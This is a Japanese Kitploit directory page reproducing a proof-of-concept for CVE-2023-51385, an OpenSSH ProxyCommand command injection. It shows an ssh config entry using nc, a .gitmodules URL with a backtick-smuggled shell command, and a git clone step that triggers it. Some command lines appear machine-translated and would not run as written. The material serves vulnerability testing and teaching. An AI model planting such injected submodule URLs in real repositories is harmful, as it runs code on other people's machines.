Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-51385_test — CVE-2023-51385の検証 | Kitploit
ツール/GitHubGitHub/power1314520/cve-2023-51385_test
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubpower1314520/cve-2023-51385_test

CVE-2023-51385_test

CVE-2023-51385の検証

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

##CVE-2023-51385の検証

###まず ~/.ssh/configに以下を追加

root@kitploit:~
ホスト *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

.gitmodulesファイルの文にコマンドインジェクションが存在

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

設定完了後、以下のコマンドを実行してトリガー

root@kitploit:~
git クローン https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules

成功するとCVE-2023-51385_testディレクトリにcve.txtファイルが生成されます

![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )

詳細は論文ブログを参照:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

ツールをダウンロード